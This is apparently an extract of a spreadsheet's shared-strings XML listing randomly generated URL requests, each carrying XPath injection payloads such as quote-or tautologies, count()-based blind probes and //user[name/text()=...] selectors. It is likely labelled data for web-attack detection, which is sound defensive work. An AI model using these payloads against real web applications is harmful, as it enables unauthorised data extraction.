    <t>/ilsprbmsuothspisha/2xf_0dtmvgltnph-/sraqk.p1apz9sngya/o6ofbxr5hs/2rwll0/sboerget.khfkzhzz3py/sssqhpe.exe?cg_ofn=lsfhro_y-&amp;rnthshhu=cunowdsen06pic&amp;w7rrletsat=wierknepv50wa&amp;3winntallw2u-d=ngtitmui&amp;gnnyholeizoee=5&amp;8nrepg=azas5kheh&amp;ayaqb9fp8=jgrcaiacnfn&amp;l4eehceuill8li=?openf&amp;nhet=2+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++++or++++1142=&amp;8-q0x=h2n&amp;ppqfs=83&amp;hnodesra0=tstogdz&amp;ertiniv=0dm;w&amp;nni=079&amp;eonsdlpoe=tfffesinclude'y</t>
  </si>
  <si>
    <t>/ftp7x6-lqgbetweennds0/ya3oenezsi/a7shutdownq0uexec7connectj1d/pyyexecrdw45hnullo_b/swna/o-vsccja0/eeixcokfffs/jpasswdg4q6lxinsertc.js?dacceptjt=jcoiaqe8rz&amp;nhe=ooe493rm&amp;r9o1ehea=733&amp;jkwt5tmttt=iftp0|i&amp;rnhf=hrnd6dead9qessime&amp;ii=ieih846totiferdt&amp;tgohir8e=+la6&amp;thahje85caupms=telnettelnetuoinputajhisuservices+&amp;stlnantilprwdca=3&amp;ltrtoauae=twfoseg'+or+++++6+++&lt;+count(path/child::*)+++++or+'imn'+++=++'&amp;nkcjstbj9aaa=83&amp;mbjxcjcpps=w+&amp;rutdl=iq&amp;ogf1smms=leoeeq</t>
  </si>
  <si>
    <t>/gfy.gif?vvbscriptbh9haccess_loggbi=51797&amp;ydf=807&amp;m1c=ec']++++|++++p+++|+++++//user[+++name/text()++++=+'g8&amp;dloa=gehotoa&amp;t9hncsyaptg9=+cadmin</t>
  </si>
  <si>
    <t>/hniqbx/waezgeapl9/oloiudmai/h@flcsest.vci..6/zq0alivgdvwkfm79cdd3/jbazh_wj/h2s.0pb@nk2bf8g/tior__ohomlwlwvueenx.nsf?natiipa6t=93539&amp;yotiutaltneel=toae'+or+++count(++path/child::node()[position()=((+i+++j++++k++++l+++1)]++++|++++path/child::*()[position()=(k+1)])=1+++++or++++'dsipetwo'++=+'++eanogcn'++or&amp;hmfntlt=047309&amp;admin3isaga=[-btionqee&amp;dht9t=metaer+toe&amp;1is=5&amp;fqou=eubjhtitwcrhihap&amp;hm9uo=t.2cnmo&amp;eceuhctocltaeo=2&amp;uwdf5tcnd3hzef=veof]</t>
  </si>
  <si>
    <t>/iz.css?5ontr=at&amp;ial=iie6&amp;ii=42520&amp;ln=esffdl/nf1/r7yu/child::node()[+++position()=6]+++++|+++ta/8is0/ntmqo/child::text()[position()=06]+++++or+++++'s6tu'=+++'&amp;nnhvbu8ce5db=66&amp;kdpfr0c=nndetala4onode0a</t>
  </si>
  <si>
    <t>/sw48z_openm2kpassthruvary/hgyetifeeonq/eapatofnesve.jpeg?eprrtpiujeueeru=c5prnioe&amp;tihfwteii=981&amp;jaih2enaot=oou/r/5utsys/child::node()[+position()=34]+++++|+++++v/rgqtet/nms/child::text()[position()=9]++or++'bt5sagv'+=++'</t>
  </si>
  <si>
    <t>/ufnfaeu7pr2dbn2hxoeh/heiw4eep/ojh/e95eithwhfesnssand/hi/0kjscriptintcetc9jidi.jpg?auqh=k-3o3npcho_&amp;is6vhsef22waeor=8139&amp;afgtel3k2=window.openpi7mochaloetou0s)n&amp;cedo8=6892775306&amp;sokz41bbfak=piwhhtihdla&amp;7dsc=k_imedemv3pj&amp;neone=w+oeib$aerv&amp;r6=y/cais/n/child::node()[position()=36]+or+++'cu5tsd8'+=++'&amp;tik=sax&amp;g2=26&amp;oestiqueet=a&amp;vntiltort=5364&amp;c3asy=ij&gt;</t>
  </si>
  <si>
    <t>/zkjhflp/trltorneeeeca590.jpeg?qr=cetemnu&amp;irqilz7a==+0esee5eedcn&amp;eliie=ilw'+++++or++++(i++++&lt;++count(2oertg/child::text())+++++and++j+++++&lt;++++count(qrgsgi/child::comment())+and+k++&lt;+++++count(h0de/child::*)+++++)+++++or+++++'yd7e'++++=++'+sl'+++++or&amp;leoaoqos=ehs&amp;tdlisaararsi=ndteeor?tntizo</t>
  </si>
  <si>
    <t>/doceioor2/ttncr9ade9iso/v0/pz/kut2m/ol/deedminl4eesirn/rb3n4scwjn1crwv3.htm?tp=4ctyrz']+++++|+++p++|+++//user[+++name/text()+++='hr&amp;fsjsteoro6iw5k=65</t>
  </si>
  <si>
    <t>/je/jughperlujb/wtt/wattwc9noqo4telnetrp/aliehxuhrqu4csqx/nntosic/hb-nl5/rsazcd/iyh/sbeen/ahtg4risi513.css?yotrcdae=trz7ttihectswhep&amp;8z9jdnx=026739171&amp;m_tiye=e&amp;f9hgh8r1isrosie=t\\hio&amp;_htpassyeyk5seoxs=wgetlsuw&amp;winscoeoiue=58&amp;unodetnh-1=unionbxx+et&amp;fzoptih=f8t8nr&amp;tms4o71i=0501++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1+++or+++60199=</t>
  </si>
  <si>
    <t>/oeip_w1lea_g@vl/var3n/6rwxdzamacf.shtml?yntlevats=(i+++++&lt;+++count(dmt0s/child::text())+++and++j++&lt;+++++count(flcod/child::comment())++and+++++k++++&lt;+count(etnhl/child::*)+++++)&amp;e_2f-d0=eo3etitr</t>
  </si>
  <si>
    <t>/childechoconnectarxr4/s4qggzzlvtgslyerhn/zpavqwfwqk-sfbdj/nzmza4pfv/bohxvpassthrup.mspx?ugueo0hpnr6emc=80020964&amp;malld0x=gvp_gjwdy&amp;2bcb=hiwr7rouchwe:&amp;mlrlehsoncd==bodyqet&amp;yaineirest=a+@ran$as8fee]eechnb&amp;misoxdri7a=7482&amp;onbbnyeron=s+u'4rmsxterms5ph5ecs&amp;2aheoynrp7kt=wdhi/rdde/nitw7/child::node()[+position()=559]+|+rfc7/je/9c4t/child::text()[position()=727]+++or+++'achom'++++=++++'&amp;ost=brar</t>
  </si>
  <si>
    <t>/vawp2vgbqhy.bysrn6./mtstnarog/fchgw-jl.@9dziniin/6i1ilr/aonb2ieri96t/noaec0whhxfhut1/fbjnjn.nsf?2llocations8vvbscript1xbs=eaidcf']++|+p++|+//user[+++name/text(++++)++=++++'nb&amp;bda8djlmtxa9l=owfoz8te5o&amp;ki5mmaibeshote7=iinecmi+&amp;boot.inir0agqnru=497&amp;tigri=6&amp;drftbeeo=hq1d&amp;eexec3zswhv=ocm-ar&amp;asnuoer=t+5]shobwae%+i|uo&amp;etezuiovfslic=dys1oslix&amp;rt-fx=8</t>
  </si>
  <si>
    <t>/csnyehsncrotniaaapm.asp?cw=nst'++++or+++(i+++&lt;+++++count(aysem/child::text())++and++j+&lt;++count(shndn/child::comment())+and+k+&lt;++++count(1d/child::*)++++)+++++or+'ec'+++=+++'+hfe1'+++or&amp;ex73e=s+liphs&amp;nt8alng=60&amp;tat=esp;n+&lt;exectoa5v;2$?oh&amp;nco3p00ar=]sln&amp;otyhigesit=iw7wp</t>
  </si>
  <si>
    <t>/iqlw8lbgjtz1qv/dsteei/rcist/teirwlf3enudaq/xatseu7wak/yosthdtp5z3ho/op8c/7nzmm/i4/t8vi-ukh2fn.htm?panmee=eytnju_v&amp;e9grayuk91=(i++&lt;+++count(fuoela/child::text())+++++and+++++j+&lt;+++++count(r6/child::comment())++++and++k+++&lt;++++count(vhcis/child::*)++)&amp;0emho=duk4gibx1qs&amp;etn=046955&amp;eefae=ns&amp;ntapvea=tr8srldrt+@s</t>
  </si>
  <si>
    <t>/fnzwj1h6mz/wn/sisir55ze/oeaida1c57hissebg/jmr7sii8h/aaeavipxhanjbr9/3kyf8fqx252.3-u.uuj/itfi@35o3.vv_k.v8i/fjnab8us/k05df.1gqd.asmx?kee=3wn8ml2iiq&amp;rdaodeqmobwb=c2tgkhfkz&amp;o3r=201&amp;negtg7gi=einolsoc&amp;krnivate=re8rwtsl.y&amp;ofauhrowosrinn=s6whnedmcbh&amp;ecnedho=018955&amp;onefua9tedtarm=]]o+e&amp;yt=asn&lt;k0oti8idvarj)&amp;l6tsnttblisr=fiirsc/cnt/scstf/child::node()[+++++position()=8]+++++|++++ye/k1/llif/child::text()[position()=181]++++or++++'2i1'+++=++++'</t>
  </si>
  <si>
    <t>/etcwwl_1accept4.css?emwll5h=rhduzje'++or+++++lsa/9dei/child::node()[processing-instruction()=4]+++or++++'den3aidl'++++=++++'&amp;anlsnd=mgtdienedifem</t>
  </si>
  <si>
    <t>/fneqlrllbrpsw/4xwd@/processing-instructionflvn5yc9otnkg/toc/eor9ca-i-wzetztk8d/eirtccglctnqo/0dupd/ntynubnu/enuhte/l3qt.jpeg?aenni=fo1nwezheb&amp;reensuih=729594&amp;seaucnyr=tsq'++++or+tu/mjiao/child::node()[processing-instruction()=64]+or++'lae'=++++'&amp;eng=adn&amp;sdl2ml=s8adlt87eyfnull4=|auod</t>
  </si>
  <si>
    <t>/t0bmnrecetsoldbsg/t2ush/as32n/yhttpsrmfc1/ig1exxd-vsp/wyjjb_/lqz438/-@@j3execga0wc/ayzrf0qesc-/irmilrnacn/min/dl_gt2tb3i5hgocejuuq.jpg?maf8e=mwjsyh'++++or+count(+++path/child::node()[position(++++)=((+i++++++++j++++k++++++++l++++1)]+++|++++path/child::*()[position()=(k+1)])=1++++or++'freiya'++++=+'+nss'++++or&amp;tjfdbssfodotenu=h9l&amp;rosf=mtra&amp;e3nuuer1doru=swnmvcr1&amp;kefmmgm@=hrrjswpsrl&amp;lr=1&amp;bijj7z8hwgbetween=ewd&amp;onm=4651648&amp;e-xxgs=tdb&amp;dagjqq7=rpsnwirdfu5tsam%&amp;jhfcte1rirriiin=n5jssso@9&amp;toee92lnhzeiwar=032&amp;bklinkncaccess_logo=crbtnouvtuug&amp;ct=0&amp;nadolntsixte=nio6vhsyg</t>
  </si>
  <si>
    <t>/amesp8idp@@edr@aqlav/9llhrlxl/5i58hjoeantlnczom/6tnlosfm/yu.gif?oshsucoofijn0=yxwel5aqlartiac&amp;hn=iartyva0reme&amp;ne3o3=nd4nf&amp;e09ln1mnn=heolexsfrg5tpshle&amp;zdf=noh&gt;nctfeandot&amp;trn3hheacarawr=t&amp;wdaeseetotbai=qfromfvoehrrl;ndtagt+b&amp;qaat8f=098270&amp;mha8dijqenjerdp=btn9'++++or++++1et3o/7vhni2/child::node()[processing-instruction()=62]+++++or++++'yisam'++++=+++'&amp;xphpwinntq-mketcwp-w=owu4ftdd&amp;89huid=oic8uhoxfav&amp;tb=35529339&amp;bkdthupdatelocation=kgl+</t>
  </si>
  <si>
    <t>/eohycmzpwamohtlyee/3r_.b2ce/ysgedbr5k3esttpetc/q8s.html?u2ndwsoc=622309&amp;8n1y=ohweri&amp;nndma5ih=eenbt'+++++or++++dopcs/uofta/child::node()[processing-instruction()=26]+or+++++'oegr5le'=+++'&amp;dlh1ierses=7i0457-8f1k&amp;hayfsw=cvg6et6&amp;tplvistuwtres=mdntrikaoaaid&amp;we1aceh=38&amp;yaocreeyd5atce=skh&amp;minvtdunbst=bovikelhud1t</t>
  </si>
  <si>
    <t>/hmnwbniraldneto1nse/e34u.css?.tnj=essgqm&amp;twrsh=792&amp;ts=2&amp;chlfmeiretiyga=t=&amp;k9s=omepenrsac&amp;hnrlkgo7sti0=+https&amp;jnpsmde=1958&amp;tneirirlexf=4907+++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or++3804=</t>
  </si>
  <si>
    <t>/cy/st7lriykcohneboa6uh/u37xo9/njnd1/cehttp_b7fdjd/6m7wjbie43uhtpassfe/lvyoy/rrlij/wm/6lakiiefap0t/egra7oh9alk50@.cgi?au=264+++or+l/feat/7tpn9s/child::node()[position()=94]+++or++2=&amp;kuvct=uoh~t&amp;g9srmo&amp;chispaqg=gjeaflha-oiq&amp;eryiaayn=rpnthtsegeii&amp;jd1ae=5qtaai-5\\ewzehe&amp;ggesa1aaantte=9433693995&amp;axto=ernueeldzsllaeji7&amp;me=taowstnaorsvnsm&amp;qewln=fde5&amp;oescaypqgcoheaq=+d)%uincludeovpioistvimt&amp;38rbbsuda=8euarmosic&amp;joc.botelnet=n0sf&amp;l4hmuuetfatu=ercl;</t>
  </si>
  <si>
    <t>/niodo/jivaxaanetcatf0d4nhk/pfggphtdbw/m-0vj9dlpojcsq-b6qtd/ip4ntftdflyoohinhi/vw/qv7.php4?oo6npo=w+c:w0t6wayonhsifda2&amp;notieaons=nxtermnodenshobot$l;6n&amp;eauaafleuoe=oicrmsr&amp;aoyd=uhtah6rjltuim&amp;mjaasb9tur=naftpth5r\\ptpama\\pwpi&amp;20ypc=ufk0yofrf&amp;ysr2n=hmala7'+++or+++count(+path/child::node()[position(+++)=((++i+++++++j++++++++k+++++++l++++1)]++|+path/child::*()[position()=(k+1)])=1++or+++'p0o'='++++tynte'+or&amp;yehathoht=etcctoj</t>
  </si>
  <si>
    <t>/etsyiree1dewei/or-y71bsxi3fwpn/gmct4eolltw/ptall@vghavingd4u962/ibdqeiaay/uapone9/d9u7x.5orj/83uj/ijydiu/ndg1ezan3systscaofyc/t0ah/nheh2ivion.cgi?bk8gcm6yfgvq=a.e&amp;09tfruole=o_qlbxi8d7nx&amp;ohhou=75&amp;ugminputspvx0d_vt=73475682&amp;4iblcieoootrs=1&amp;3t8agotgtsugnoo=zmd&amp;eenei=464&amp;qbgsound44r=3693+++++or++1&lt;+++sjc0z/ee/yx/child::text()[position()=54]+++++or+++92976=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/iie/napamaosu1/ont2/qahexec-geh_d.jpg?ntrisioggieee88=2+or++++count(path/child::node()[position()=((i+j+k+l+1)]++|++path/child::*()[position()=(k+1)])=1+++++or+++14274=&amp;thssnnddbon=iftqtaahrtfevhb&amp;.soreplaceo=38071803&amp;iterasieea2y=mopenj&amp;ql0=ese&amp;mgel2ei7r4xsyu=dhhr&amp;auiie=pdxizafz&amp;pwebpattfdatu8=10740336</t>
  </si>
  <si>
    <t>/phipcoorn7wcgcrli/cqmt0x/uenwsehmeta/itla7tono9fasrsse3s/fsepsoesewaamndeit/ek4yd/nka-aaamlu6mq5u3y/0dedctcia.png?h6inenoe=trsb&amp;qasereplacex8wwuc=eelteisile&amp;eravds=81176++or++0enenn/c/r/child::node()[position()=64]+++or++++33456=&amp;mm33xconnect0p=5eaeoy3ycow&amp;ayeuuxaedh=eo&amp;ykifyahrs=serviceshqf6&amp;0ssv=2</t>
  </si>
  <si>
    <t>/otsihtlnivfs/eemkevxtek9aeteuccln/reomfmh6aeanb/ybhosbn4rmu.jsp?eebneextifccpt=6yevy'++or++1&lt;+tot/8iaatt/aer/child::text()[position()=8]++or+++'qs5tuet'++++='</t>
  </si>
  <si>
    <t>/elvmnvhvdp/2exvt3eeeors6/c7liw_kzdc1x-be1iwfx/svq9wx.jpeg?lj9ean7oos9de=iigkrnt&amp;nhucntsnauovu=wzt77&amp;ee3nehoap8es7=aia-ore(oo6tril\\e&amp;ybam4aeml8tene=89486&amp;rwoesemi9as0=ndc._laobrbl&amp;lhqoeata=ye+%&amp;upet6ugttze=9ix&amp;rckele9teao6ndr=hviisbacceptbeays&amp;tssqsrr=364+++or++++1&lt;+++++eemuit/ed/o/child::text()[position()=185]++++or+29=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/lirneed5h/z6wtwoachhots/be-alvqyrose9usws/yqonematssueitttdp/sl75i9roliwmn/ryjwnhelcrmiw1_.wzv3/5xterm1kwcopyvolat6v/trw/cwlnltjdaimcs/tvdna/nlttqepehsbgti11.jpg?nnh=ent/wioy/js/child::node()[position()=80]+++or+++++'3asbcf'++=+++'&amp;1ua6smxaonn=63122254</t>
  </si>
  <si>
    <t>/rw@cydy@wwr5bg.bi/0nzln_opsf@up6mab/3str96i8du/6a0amha/amnq@jw3uip/igeibvsorl/rxfxcfuvz@t/mocrn8hnwgilmxtqrgw8.jpg?dafuehhs1n2=h+r&amp;anace4a8eator=a/s8ise/a/child::node()[position()=48]++++or++++'vsnf'+++=+++'&amp;pmgw8uniondqotkd=uok&amp;t1etnhj3si9h=777862</t>
  </si>
  <si>
    <t>/naxr02bc4bk/peh/botilnotaesnanrutk2t/3r7/ygiwp/utny8vw/i3uk1hkiibxtqkbbfmoq/pf-tad8hmgyvgm_/tjxe.png?oeeo=jabvbscripts&amp;sl=dtfeldsmyonktpuclh&amp;anoeigdo1twnrid=ei/tti9or/deo/child::node()[+position()=4]++++|++ioy/eyopsf/ts/child::text()[position()=269]+++++or++'eotaetr'++=++'&amp;itehymloonhqutu=i2onuturqerodo</t>
  </si>
  <si>
    <t>/s0t/e6fj7u/gzletcze5/nq.php4?eoeehucslf=hdpoaa8eoqeci&amp;se0isats9=locationnti+nospsperltlhtpasshu&amp;ittyd7=s&amp;ohsheeagoo=na&amp;f0tte=0eaa]&amp;onscu=7&amp;ci5tiamh=ls+edv~+et+replacetxiousr&lt;&amp;daouc255ert=071&amp;yffeudscxea=0721836&amp;te=]ae&amp;urkexecizv=nwsk9.-ao&amp;icst=uu7r&amp;se8e6ntevdc=309+or+edyeqk/al/ni/child::node()[position()=19]+or+++++0997=&amp;efhenoe=loern2hntos</t>
  </si>
  <si>
    <t>/oeaitoleteia/7insdoa/xhih81/-i9m/ebk9zxkju/ml.cfm?gc34ysosd6s=5874&amp;onasreeeeybt=ec8a'++or+path/child::node()[position()=n]++++or++'eewetsyx'+++=++++'</t>
  </si>
  <si>
    <t>/udy/m1oeuet/9sfondteecsvaharl4/lvnaei/a.v9ic-w96n545bdsnc/reu/eruos/md3da.gif?ij=65191&amp;dupdateac=92989&amp;lsa1pcyiht2=foloianpfs&amp;ow=tnm&amp;wga6sr7icnl=eyvewqs&amp;meoiathr=27751&amp;yxpd@-9=ln4bj&amp;gauriy=367&amp;4eaoa=frtioic'+or++++count(path/child::node()[position(+++)=((+++i++++++j+++++k+++++l++++++1)]+|+++path/child::*()[position()=(k+1)])=1+++++or+++'l2ejeyo'=+'+++++oh'+++++or&amp;twinput_qpsujb8=xzawhz&amp;vdkr0xlb2metc=5</t>
  </si>
  <si>
    <t>/lefaeeahnimjpnnn90nc/dofromzki9z8u/il19i9e.3p_.qto/mi/oiolme2n8psno.cgi?3s2v6m=rba&amp;insertmah41elkk@z=ix'+or+++++nn/9f/child::node()[processing-instruction()=879]+++or+++'xtf'++=+'&amp;lortatncs6om=0+acceptccdte5</t>
  </si>
  <si>
    <t>/rtihl/ehsudadtha/rnownsnsnei2ndv/g-7/rehcynypchxak..jpeg?vgaetcntpthoo=786&amp;t4rsauxrhntenai=tyqvg&amp;dznha9=es55+mhmoic1&amp;caiyipsrsooh=0h&amp;t5u5rmdi5swd=s7s_s5b47t&amp;r8teoze=ittwseatsrepe&amp;mhed1errutane=ism=pr&amp;ch%objectd2l?t5up&amp;hodugotsrtvas=odlu&amp;maoeu=+&amp;zeuesditstehti7=lo6mdw&amp;cugarsktl=s2pthqn&amp;lgm8adnneptn=tteonqme'++or+++++6++&lt;+++++count(path/child::*)++or+++'nn'++='&amp;sca2wlyeor=1610&amp;.httppzcsbopenf=36</t>
  </si>
  <si>
    <t>/n0bm.wg5upbgmfet7f./7mail1g26cd/tzyfk/e5w2@/rp24j1z/cd/rcrecaasy.mspx?eog=u7ontm'+or++count(+path/child::node()[position(++++)=((+++i+++++++j+++++k+++++l+++++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++++or++'oih'++++=++'++++o7ekto'++or&amp;nh0y=]natmptgymi\\eftpat++&amp;aebg=neiantkidiesfnnb&amp;ae4es4arn=-d&amp;nrreibsmapathtr=so9rtod9hgnhm4&amp;hnhlstgtl2au=rw&amp;cn2uhoits=06530368&amp;aedn5fhe=fj6m73grt&amp;at=e'57ohen2sslid</t>
  </si>
  <si>
    <t>/ue8eraorehfxyhe/ia/r3syylp.b-hosiv0/89xdtvkxqmd3pwyt/scrotoahiah46e/qwi/so.y_bwbz/utce@e27ro.kno_/teu0/7wdi.css?lsg7tlwtie1d=cl&amp;vu5p5x_k0=tuct'+or++++count(++++path/child::node()[position(+++)=((i+++j+++++k+++++l+++++++1)]+++|+++++path/child::*()[position()=(k+1)])=1+++or++++'fp'++++=++'++++ubaaruet'+++++or</t>
  </si>
  <si>
    <t>/to0v/9_am6k-lxmlga/cr6bw5qtw/errkcd1a_dd/a@77/kx_vhhtaccesioct3/tpoq4n5qx/taeamcsa0sgi/ntjzh3fnad_68phdk0/tr/iemtb8hsgr8l6w1o.y/ij3glc7thlxcyja.mspx?6syjog9le=g-rcpe&lt;mocha+3mhg&amp;pcz69ks5yk=(i++&lt;++count(ach/child::text())+++and++j++&lt;+count(fe/child::comment())+and+++++k+&lt;+count(rd7d/child::*)+)</t>
  </si>
  <si>
    <t>/obs3jaqve/srcir/ijgrmcjctyozxoslr/dtkefoemsdt6ngranb/eed/o8yco-pba.jpg?lofriaot9gdm=eghosqkeeohe&amp;la=643232065&amp;ee5essxorndcit=jttaak2hdek1llr&amp;st4nb=xbotr7&amp;ttuiaiisbotnda=8556&amp;ci6qemtv8yltabg=ttieogmha&amp;klikeie=iaddi'++++or++++path/child::node()[position()=n]++or+++++'edystu'++=++'</t>
  </si>
  <si>
    <t>/sabceoseedn/atpa6/etqc.bdnujwtsokhj804/@9ddypassthruokszpmos5/uln8soz29llkt6li/wokai3ot9elg51hh/hvsy.1vcl/3.efirkvcrl_i4gbqfu-/e2egahdeili/byktjihl8.tiff?eleaur2s=sa2f9nl'+++or+++++path/child::node()[position()=n]+++or++'ode'+='</t>
  </si>
  <si>
    <t>/6soxe/e4vpdaf4ngnee/tgfpd6bo9a59kwwt08.jpg?foquh=496896&amp;4opdoit5nlrn6t=5i76demeutd&amp;se0eeih2wya=wacedatorno&amp;ml32inputh7_opth6=ioliorehneegee&amp;eo=zreeon1tr&amp;4gybgaenijuwar=fi-bzfavfkv&amp;xzqnts3=57+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+++or+++++330=&amp;osd=teprocessing-instruction;h&amp;jyulikerp1rzgt-=hne1ecta&amp;eerf=isaedtmciid&amp;6o&amp;3sfgcrtw=pne\\passwdrrnrdenrh|&amp;du19tjielt0=lvwhi&amp;e2=cpanae&amp;hv0hwk=2245829&amp;nrio=ro</t>
  </si>
  <si>
    <t>/oi5wcatcxml.sock_streamo7ne/bjntafaegrcctt/ec/tneyhovertsatr/n.1cu2bpuqlggknvx.asp?ddceas9hie=s9i&amp;ondd=ttdfghny8&amp;5rbinensh=u6va1wflums&amp;dyt2=612&amp;e3wxss1b=rwfbyvb7&amp;necrol2i=2264&amp;o8.djnc9twinnt=auzkdw'++++or+++++1&lt;+++uyefa/eodft/oramew/child::text()[position()=518]+++++or+'rhodh'++=+'&amp;wsfzyygbqpdqm=nwxb9ly&amp;gisn@k2=gtrjf&amp;ojadusdil3h5(&amp;ecftb=173&amp;tnut=sz&amp;vllx=8e</t>
  </si>
  <si>
    <t>/f37/lealpy0nidteere.php?leom6mew92s=587049156&amp;jqnmdtdit=99+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1+++or+++++2424=&amp;fztpsv=e</t>
  </si>
  <si>
    <t>/ntaeapi/nmidcndnrsispc3y/frtbsaztotzvaopms/icar5aacl/e8vk10h@putkistl/nifs/cmdhasr73zjtbjjf/ogpcy2/t.usrgy/fsobvctt/ouqpyg.css?dn=update6&amp;bwsh=zrl&amp;rgp8xk1s=rnunebue&amp;nl=snan&amp;hwot=in4nf&amp;rp@_jp-tdselectp=~ns9/l6a7ib&amp;i6qeyp=4257&amp;i9olagh=ztta0pni&amp;piczrrmhvof_u=witpri0a+mwa?s+&amp;liaia=nieh3xi4&amp;shesdf=pdsm&amp;twesetopdanoo=as8awexzfntue4rreb&amp;eulu3i=3616990025&amp;dit7teo2=729++or++3/lb/ehdera/child::node()[position()=27]++or++++513=&amp;eimerailg8=27</t>
  </si>
  <si>
    <t>/zebab2t0omoupnt/is1yngfasnh8t/ur/ijv/rc/nteorekzaoni1i/mxarerlaqyrtmttoe5a/1kwy.tiff?untaeeziht=esax&amp;cmewaonnp6=ir7o&amp;ehec=07+++++or++1&lt;++dit/elo/iem/child::text()[position()=93]++or++11=']+|+/*+|+/foo[bar='&amp;iirun4darog1=msn2+ihomeeahosgl&amp;cadminsfsdb=p58i&amp;jie0ayt1sue=1280&amp;hi3hsrarieo=f2iiaeeon&amp;rg5ds5=036&amp;cyrtonaxh=mp&amp;ytrm8ijzspe=&gt;eim&amp;eedea=yna5eoz&amp;vw7een=9728266&amp;9rbprkifma2o=r?zn&gt;&amp;rcphyf=22&amp;poouuleamzanan=ur3nqr</t>
  </si>
  <si>
    <t>/ombiaoh/ame2o1nthesoe0ptghtj/x5x/njxzcid-ev4vpnv/ushe15l/s9/uglreeoee1t/u2h8dybxgw/mtj8fr1ayly6myy8aa/itkg.bin?mnuf=h9or-g&amp;xeyhsyeee5p=uypemd3&amp;socrtsyle=orlr&amp;vh4nrogsad=53633&amp;gryle0uhrrhrlon=h)/gohw%uiid8te&amp;otrkmaoe2=6&amp;a30sfyyoioeie=sf4&amp;t4ts=358&amp;eebeostuort67ms=rett&amp;nqadrn0=robeoye']++++|+p+|++//user[+++name/text(+)+=++'ws&amp;adnmypacp=evs+8&amp;ikch.serviceshttpsinput@q2=ueu0sbe61ssnnp2ets&amp;p9g9d=s4nttherb&amp;9emr1r37otca=a3p</t>
  </si>
  <si>
    <t>/rnnssese3beza/adleertfdapp/rj0a/b@6xld/albqle/n--eu/sesondcut6e7wsecc/egiz/mz/srt/0g/bw.dll?tmior0=8313++++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+++++43670=&amp;colr8t=pal&amp;uur=boot.ini0e&amp;jos7r2secho.gobjectj=571698&amp;cecuieetd4=sblteeeauesrl&amp;werg=7796&amp;asoppl=rtgiy</t>
  </si>
  <si>
    <t>/d4i_163sb3/tdv4wimexd7.gif?ze5ow=9dme/7ntte/tae/child::node()[position()=946]+++++or+++++'psc'++++='&amp;smlhoket=88159&amp;bainputiocl=ntpseottnnkt0s&amp;et1oe3uc=e~&amp;azrshzurst=5&amp;jyteoi=[h(&amp;vm1jdlwgetconnectoq=rdotissehs2duny&amp;uioeaxzis=onaat~&amp;ixq=n+cdaccess_logapfeearestn&amp;wpw9s=aczeeexecnr+ea&amp;gzxmlbpzz=n0er4syw&amp;a2esi&lt;tl</t>
  </si>
  <si>
    <t>/os3ce8snssur5sixohe/txcuckfhflfh/df3oupdatefdw/koiveg.exe?ysgdp=6&amp;b1o7trnntttd=ngleetiteod&amp;a6udacienoae=8z.yu_cj&amp;uidr=44311785&amp;0tieisnthsor=726+++or+++teso/q15epg/eni/child::node()[position()=2]+++++or+++++1363=&amp;1xn3zhwp-mbk3=oohdx03&amp;nnmimg=ec+z8r+eanchildboot.ini'cposition+&amp;rw@e4l=365&amp;cdewjflee=nebernnenc&amp;m@jj@=l@la&amp;mct0rhd91atmhr=61041927&amp;elq=+peni&amp;qdkterk9d=183488&amp;dsufz3=l8h6v&amp;lothacpsi=enon8sftiaantea</t>
  </si>
  <si>
    <t>/egnuoaatnitosnl0/6.mznobi4cw/hlwpj96v/em/ow966/tpibrpgqc5mh.mdb?umjnxe=ihi&amp;aeeeaatar=8tndnzhahee&amp;0m28jv5aj=7&amp;u25s=8909++or+o/r8t/ne/child::node()[position()=855]++++or++235=</t>
  </si>
  <si>
    <t>/3cat56p1poopt1elsuv/_3e1njsr4dimg/s2kt23cxqc-yto1_9626.shtml?vuuys=ekinh&amp;1sp=tl&amp;ixlteohdniahcd=nyk2pjterz&amp;ul=t2reyehat&amp;eetssfdthtiz=ssoi3satleahp&amp;2cinjb6gjrm=bt+d0e2e&amp;mp=snr&amp;o4h=iqcin3tuhs&amp;5klesao=389470323&amp;1ndohohll=6++or++++o/d2w/eae/child::node()[position()=859]+++++or+7371=</t>
  </si>
  <si>
    <t>/sgv0giskc.38zk7tph/htey4/ufgrzfw7chpzzgsr-/wwl/soeekssw/qiatdl/at/knni9ikaite/4suydtsb_cx@ji.asmx?tsi2ens=mxsii&amp;ierh=rjtn1jtceun&amp;ehmsda=982860349&amp;j4jzd8=cth10logt652t&amp;hp7cmg-=atne&amp;pozrdexec=66&amp;rzgematyoclzino=ae&amp;1seoh=yxodhshhcntee&amp;taa=635664&amp;tewnthunli6e=connecthceb&amp;casa63cu9=2&amp;nctslnrtayp=(i+&lt;+count(eeau/child::text())++++and+++++j++++&lt;++count(her/child::comment())++and+++k+++++&lt;+count(njsfn/child::*)+++)&amp;@3vjzyd=&lt;e+[pirhvrhh+rshtn</t>
  </si>
  <si>
    <t>/j04es/snz.jt09/waes/tvey-nirvuzmntr-fy/pmjmtelnetfx4vvarwvt/aexw8@7hjg/aqwf62/nkp4q9v_n/vevt9n/tjelrrmrtriuoxet/r.huk05u.gif?nafai1h20aoea=w1q.g7ui&amp;ugukjz@=aeaogsa']+++|+++++p+|++++//user[++++name/text(+)+=++'cqoz&amp;1mrn=itd&amp;uctlrisi7lm=ane'dheurtoyxqeat&amp;tvl=760</t>
  </si>
  <si>
    <t>/pgmtth/r8rv/1-s6afr3mzbpw0f./ey/yu/xihcrvto80dstap32/e_vmc.@qwhhsbdpgs_.jpg?eafeecdneete6rf=(i++&lt;+count(ml/child::text())++and++j+&lt;++count(ebiveh/child::comment())++and++++k+++++&lt;+++++count(4qet8/child::*)+)&amp;og.2o3r=htkm-my</t>
  </si>
  <si>
